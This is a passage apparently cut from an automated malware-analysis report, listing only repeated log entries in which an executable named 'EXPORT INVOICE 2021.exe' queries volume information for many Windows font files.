          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
